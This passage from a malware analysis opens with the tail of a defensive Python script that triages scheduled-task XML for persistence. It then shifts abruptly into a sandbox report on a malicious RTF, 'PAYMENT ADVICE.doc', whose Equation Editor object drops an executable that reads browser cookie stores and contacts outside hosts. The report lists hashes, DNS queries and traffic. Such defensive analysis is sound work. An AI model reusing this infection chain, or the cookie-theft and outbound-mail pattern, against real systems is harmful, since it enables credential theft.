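  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\user\AppData\Roaming\HYPOTHETICAL.exe</Command>
    </Exec>
  </Actions>
</Task>
"""


def _text(node, path):
    el = node.find(path, NS)
    return (el.text or "").strip() if el is not None else ""


def triage_task(xml_text, now=ANALYSIS_DATE):
    """Return a dict of persistence indicators found in one task definition."""
    # The declaration says UTF-16, so hand expat UTF-16 bytes (with BOM) rather
    # than a str; that is also the form schtasks /Create /XML consumes.
    root = ET.fromstring(xml_text.encode("utf-16"))
    f = {}
    # Enabled logon trigger: the payload re-runs at every sign-in of that user.
    for trig in root.findall("t:Triggers/t:LogonTrigger", NS):
        if _text(trig, "t:Enabled").lower() == "true":
            f["logon_trigger_user"] = _text(trig, "t:UserId")
    # Registration date far older than the analysis date: a canned, backdated
    # template rather than a task created on this machine.
    reg = _text(root, "t:RegistrationInfo/t:Date")
    if reg:
        age_days = (now - datetime.fromisoformat(reg[:19])).days
        if age_days > 365:
            f["backdated_years"] = round(age_days / 365, 1)
    # Settings that keep the task alive and let it catch up on missed triggers.
    if _text(root, "t:Settings/t:StartWhenAvailable").lower() == "true":
        f["start_when_available"] = True
    if _text(root, "t:Settings/t:AllowHardTerminate").lower() == "false":
        f["resists_hard_terminate"] = True
    # LeastPrivilege + InteractiveToken: no UAC prompt, runs in the user session.
    f["run_level"] = _text(root, "t:Principals/t:Principal/t:RunLevel")
    # Command under a user-writable directory: no admin rights needed to plant it.
    for cmd in root.findall("t:Actions/t:Exec/t:Command", NS):
        path = (cmd.text or "").strip()
        if "\\appdata\\" in path.lower() or "\\temp\\" in path.lower():
            f.setdefault("user_writable_commands", []).append(path)
    return f


if __name__ == "__main__":
    for key, value in triage_task(SAMPLE_TASK_XML).items():
        print(f"{key}: {value}")
```

The same function applies unchanged to a task exported with `schtasks /Query /XML` from a suspect host, which is usually the quicker route than carving the temp file: the registration date and logon trigger survive the export, while the temp file itself is typically deleted once schtasks has consumed it.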
C:\Users\user\AppData\Roaming\1ht4xmev.key\Chrome\Default\Cookies
Process: C:\Users\user\AppData\Roaming\merciesxdncdc.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 28672
Entropy (8bit): 0.9650411582864293
Encrypted: false
SSDEEP: 48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE
MD5: 903C35B27A5774A639A90D5332EEF8E0
SHA-1: 5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF
SHA-256: 1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74
SHA-512: 076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277
Malicious: false
Preview: SQLite format 3......@ ..........................................................................C..........g...N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\1ht4xmev.key\Firefox\Profiles\7xwghk55.default\cookies.sqlite
Process: C:\Users\user\AppData\Roaming\merciesxdncdc.exe
File Type: SQLite 3.x database, user version 7, last written using SQLite version 3017000
Category: modified
Size (bytes): 524288
Entropy (8bit): 0.08107860342777487
Encrypted: false
SSDEEP: 48:DO8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DOUm7ii+7Ue1AQ98VVY
MD5: 1138F6578C48F43C5597EE203AFF5B27
SHA-1: 9B55D0A511E7348E507D818B93F1C99986D33E7B
SHA-256: EEEDF71E8E9A3A048022978336CA89A30E014AE481E73EF5011071462343FFBF
SHA-512: 6D6D7ECF025650D3E2358F5E2D17D1EC8D6231C7739B60A74B1D8E19D1B1966F5D88CC605463C3E26102D006E84D853E390FFED713971DC1D79EB1AB6E56585E
Malicious: false
Preview: SQLite format 3......@ ...........................................................................(.....}..~...}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\JxCmQoa.exe
Process: C:\Users\user\AppData\Roaming\merciesxdncdc.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 918016
Entropy (8bit): 7.288418109516271
Encrypted: false
SSDEEP: 24576:o8mDgYIvzz43Apj32FeC/V87ZXKzahp/:e1KHcApj3ql87EO
MD5: E85A0E1E81ACBCEA6A0E10EEEDF32F6D
SHA-1: 3C613A4D232645CCCBC7C1D8A3A8AFB54CD2D56C
SHA-256: AE7399822AD5EF4D9BD2690DF74F6F1B472103380BE74FCA33611CE7265EBC01
SHA-512: E9CEF57CAA3EC7A32D526934BF83154E555B0577629FA527028AD9D6385C80629917A2C46BE82388616A670F0830F4EB23A883A2CB34DF7EC28330A7A1B4E77A
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 24%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y..`.................V..........nu... ........@.. ....................................@................................. u..K............................`....................................................... ............... ..H............text...tU... ...V.................. ..`.sdata...............Z..............@....rsrc................\..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PAYMENT ADVICE.LNK
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Thu Jul 22 23:30:34 2021, length=4547, window=hide
Category: dropped
Size (bytes): 2068
Entropy (8bit): 4.590149997036641
Encrypted: false
SSDEEP: 48:8Fh/XTFGqg2M2zVQh2Fh/XTFGqg2M2zVQ/:8T/XJGqgV2zVQh2T/XJGqgV2zVQ/
MD5: E07040CE2E1AB565DEA33B6137C4F158
SHA-1: 854E081D9152EB535A0398506966A7E38DFC3D99
SHA-256: EDA2AD4E4EC04F2A59192A7695D7B5FBE167F30DDC9711FDD6C6E3A7372E7ED6
SHA-512: C01267CF2A6F6AA2DBCCCA689317D85C8503034E164641CEDD0F44A8CE0BAE7D53AE6A8B55E73268D736F8A7B2237FEDAFA08CC0455E107E5855027EF458183E
Malicious: false
Preview: L..................F.... ...a....{..a....{...{..Y................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2......R.. .PAYMEN~1.DOC..R.......Q.y.Q.y*...8.....................P.A.Y.M.E.N.T. .A.D.V.I.C.E...d.o.c.......|...............-...8...[............?J......C:\Users\..#...................\\066656\Users.user\Desktop\PAYMENT ADVICE.doc.).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.A.Y.M.E.N.T. .A.D.V.I.C.E...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......066656..........D_....3N...W...9F.C...........[D_
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 80
Entropy (8bit): 4.492965207485577
Encrypted: false
SSDEEP: 3:M1u8ogSgA4otDSgA4omX1u8ogSgA4ov:Ms8ogT3mDT3G8ogT3y
MD5: A09DEABB3E8DDD44DB8D4057AE8690F3
SHA-1: 67FD33C2F0245E33C3E9BD53CB5DB26BF3FED334
SHA-256: 514B4256FBDA9C731E7FC89315FBD71DB3533B8DC3EDB6A3554B40E4D3CD144C
SHA-512: 68CDD62A756742E7062DE36482C30B7A4154425A7428C0BA7A11F02622DF0A92FD68664A738413DE514264785B1EE1953767A6E8D24AE3E78E82A4E90582F0F3
Malicious: false
Preview: [doc]..PAYMENT ADVICE.LNK=0..PAYMENT ADVICE.LNK=0..[doc]..PAYMENT ADVICE.LNK=0..
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.4311600611816426
Encrypted: false
SSDEEP: 3:vrJlaCkWtVydH/5llORewrU9lln:vdsCkWtORWRjYl
MD5: 390880DCFAA790037FA37F50A7080387
SHA-1: 760940B899B1DC961633242DB5FF170A0522B0A5
SHA-256: BE4A99C0605649A08637AC499E8C871B5ECA2BAA03909E8ADBAA4C7A6A1D5391
SHA-512: 47E6AC186253342882E375AA38252D8473D1CA5F6682FABD5F459E1B088B935E326E1149080E0FE94AB176A101BA2CB9E8B700AB5AFAE26F865982A8DA295FD3
Malicious: false
Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                                                                                            C:\Users\user\AppData\Roaming\merciesxdncdc.exe
                                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):918016
                                                                                                            Entropy (8bit):7.288418109516271
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:o8mDgYIvzz43Apj32FeC/V87ZXKzahp/:e1KHcApj3ql87EO
                                                                                                            MD5:E85A0E1E81ACBCEA6A0E10EEEDF32F6D
                                                                                                            SHA1:3C613A4D232645CCCBC7C1D8A3A8AFB54CD2D56C
                                                                                                            SHA-256:AE7399822AD5EF4D9BD2690DF74F6F1B472103380BE74FCA33611CE7265EBC01
                                                                                                            SHA-512:E9CEF57CAA3EC7A32D526934BF83154E555B0577629FA527028AD9D6385C80629917A2C46BE82388616A670F0830F4EB23A883A2CB34DF7EC28330A7A1B4E77A
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 24%
                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y..`.................V..........nu... ........@.. ....................................@................................. u..K............................`....................................................... ............... ..H............text...tU... ...V.................. ..`.sdata...............Z..............@....rsrc................\..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\Desktop\~$YMENT ADVICE.doc
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):162
                                                                                                            Entropy (8bit):2.4311600611816426
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:vrJlaCkWtVydH/5llORewrU9lln:vdsCkWtORWRjYl
                                                                                                            MD5:390880DCFAA790037FA37F50A7080387
                                                                                                            SHA1:760940B899B1DC961633242DB5FF170A0522B0A5
                                                                                                            SHA-256:BE4A99C0605649A08637AC499E8C871B5ECA2BAA03909E8ADBAA4C7A6A1D5391
                                                                                                            SHA-512:47E6AC186253342882E375AA38252D8473D1CA5F6682FABD5F459E1B088B935E326E1149080E0FE94AB176A101BA2CB9E8B700AB5AFAE26F865982A8DA295FD3
                                                                                                            Malicious:false
                                                                                                            Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

Static File Info

General

File type: Rich Text Format data, unknown version
Entropy (8bit): 4.336591266390289
TrID:
• Rich Text Format (5005/1) 55.56%
• Rich Text Format (4004/1) 44.44%
File name: PAYMENT ADVICE.doc
File size: 4547
MD5: 71af183490ef5c747eb3b6a1417c8f33
SHA1: cbf5c744909fb1978d8bbadb3b1377e7b364f90d
SHA256: fd1d1d4f70fb3b258e798ba9ac66abd6ad9d9de16b4b2204f55519ea59eb7d12
SHA512: 73e271f3eb303443808c22f9e41d9d3d72d0d0451c7e94343beceb04a3aa486fa236fef6d72cff8d4e04fa2ae0478943edeff695d9eb95855171daa57c133c77
SSDEEP: 96:pyfv7sySj/d6PsRfPkElCaGjc9OqzL5ud9YPm2KJbe:pyfvoySDgPsR3VlCbjEOWud60be
File Content Preview: {\rtf6315{\object39586589 39586589 \'' \objocx4068557\~\objupdate6450751164507511 \objw6021\objh2310{\*\objdata363922 {{{{{{{{{{{{{{{{{{{{{{{{{{{{

File Icon

Icon Hash: e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
0 | 00000133h | | | | | | | | no
1 | 000000DEh | 2 | embedded | EquaTioN.3 | 1903 | | | | no

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 22, 2021 17:30:49.580652952 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:49.632972956 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:49.633526087 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:49.633574009 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:49.685611963 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.002737045 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.002769947 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.002790928 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.002810001 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.002815008 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.002831936 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.002842903 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.002849102 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.002854109 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.002854109 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.002857924 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.002872944 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.002892017 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.002897024 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.002912045 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.002912045 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.002918959 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.002931118 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.002954006 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.002969027 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.003912926 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.003931999 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.004044056 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.018613100 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.151793003 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.151832104 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.152087927 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.152314901 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.152347088 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.152409077 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.153651953 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.153681993 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.153724909 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.153753996 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.154829025 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.154922962 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.154959917 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.155019999 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.156039000 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.156059980 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.156172991 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.157257080 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.157274961 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.157332897 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.158557892 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.158576012 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.158631086 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.159801960 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.159821033 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.159907103 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.160964966 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.160986900 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.161034107 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.162210941 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.162228107 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.162308931 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.163527012 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.163552046 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.163635969 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.303291082 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.303550959 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.303674936 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.303766012 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.303828001 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.303849936 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.303881884 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.303906918 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.305068016 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.305090904 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.306332111 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.306374073 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.307533026 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.307564974 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.307565928 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.307586908 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.307590008 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.307624102 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.307626963 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.308765888 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.308789015 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.308861971 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.308923960 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.310014009 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.310040951 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.310108900 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.311230898 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.311255932 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.311331034 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.312470913 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.312498093 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.312556028 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.313693047 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.313719034 CEST | 80 | 49167 | 104.21.27.166 | 192.168.2.22
Jul 22, 2021 17:30:50.313795090 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166
Jul 22, 2021 17:30:50.313821077 CEST | 49167 | 80 | 192.168.2.22 | 104.21.27.166

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 22, 2021 17:30:49.501636028 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:30:49.563747883 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:31:50.287045002 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:31:50.338172913 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:31:52.189536095 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:31:52.250142097 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:31:52.250602961 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:31:52.308823109 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:31:52.335619926 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:31:52.393990993 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:31:58.546166897 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:31:58.595217943 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:31:58.595829010 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:31:58.645998955 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:32:05.951370955 CEST | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:32:06.011358976 CEST | 53 | 55627 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:32:06.012056112 CEST | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:32:06.064508915 CEST | 53 | 55627 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:32:14.860537052 CEST | 56009 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:32:14.910052061 CEST | 53 | 56009 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:32:14.910754919 CEST | 56009 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:32:14.960225105 CEST | 53 | 56009 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:32:25.041042089 CEST | 61865 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:32:25.101026058 CEST | 53 | 61865 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:32:32.681997061 CEST | 55171 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:32:32.733392954 CEST | 53 | 55171 | 8.8.8.8 | 192.168.2.22
Jul 22, 2021 17:32:32.734611988 CEST | 55171 | 53 | 192.168.2.22 | 8.8.8.8
Jul 22, 2021 17:32:32.786246061 CEST | 53 | 55171 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 22, 2021 17:30:49.501636028 CEST | 192.168.2.22 | 8.8.8.8 | 0xa6ed | Standard query (0) | maritradeshipplng.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:31:50.287045002 CEST | 192.168.2.22 | 8.8.8.8 | 0xd78f | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:31:58.546166897 CEST | 192.168.2.22 | 8.8.8.8 | 0xc191 | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:31:58.595829010 CEST | 192.168.2.22 | 8.8.8.8 | 0xc191 | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:32:05.951370955 CEST | 192.168.2.22 | 8.8.8.8 | 0x2339 | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:32:06.012056112 CEST | 192.168.2.22 | 8.8.8.8 | 0x2339 | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:32:14.860537052 CEST | 192.168.2.22 | 8.8.8.8 | 0xdad7 | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:32:14.910754919 CEST | 192.168.2.22 | 8.8.8.8 | 0xdad7 | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:32:25.041042089 CEST | 192.168.2.22 | 8.8.8.8 | 0x41b6 | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:32:32.681997061 CEST | 192.168.2.22 | 8.8.8.8 | 0xbe06 | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)
Jul 22, 2021 17:32:32.734611988 CEST | 192.168.2.22 | 8.8.8.8 | 0xbe06 | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 22, 2021 17:30:49.563747883 CEST | 8.8.8.8 | 192.168.2.22 | 0xa6ed | No error (0) | maritradeshipplng.com | - | 104.21.27.166 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:30:49.563747883 CEST | 8.8.8.8 | 192.168.2.22 | 0xa6ed | No error (0) | maritradeshipplng.com | - | 172.67.169.145 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:31:50.338172913 CEST | 8.8.8.8 | 192.168.2.22 | 0xd78f | No error (0) | mail.privateemail.com | - | 198.54.122.60 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:31:58.595217943 CEST | 8.8.8.8 | 192.168.2.22 | 0xc191 | No error (0) | mail.privateemail.com | - | 198.54.122.60 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:31:58.645998955 CEST | 8.8.8.8 | 192.168.2.22 | 0xc191 | No error (0) | mail.privateemail.com | - | 198.54.122.60 | A (IP address) | IN (0x0001)
Jul 22, 2021 17:32:06.011358976 CEST | 8.8.8.8 | 192.168.2.22 | 0x2339 | No error (0) | mail.privateemail.com | - | 198.54.122.60 | A (IP address) | IN (0x0001)
